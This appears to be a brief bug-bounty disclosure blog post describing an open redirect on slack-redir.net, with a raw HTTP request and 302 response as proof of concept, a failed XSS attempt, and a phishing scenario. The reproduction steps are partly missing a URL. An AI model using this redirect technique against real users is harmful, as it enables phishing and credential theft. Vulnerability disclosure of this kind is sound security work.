Open Redirect in SLACK
Slack software is cloud-based collaboration software. Originally founded in 2009 as a chat tool for a now-defunct gaming technology, Slack has gained currency among enterprises and is broadening into a collaboration platform with capabilities beyond just messaging.
I discovered an Open Redirect Vulnerability on
slack-redir.net. Another low risk bug that i found xD
Step to Reproduce
- Go to
- This will redirect you automatically.
GET /link?url=https://abaykan.com/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36
Accept-Encoding: gzip, deflate
HTTP/1.1 302 Found
Date: Fri, 15 Feb 2019 17:36:15 GMT
Unfortunately I got an error while trying to inject XSS.
The attacker can redirect the victim to the malicious site using legit
slack-redir.net domain name, which can be the copy of the real site, asking for the user credentials.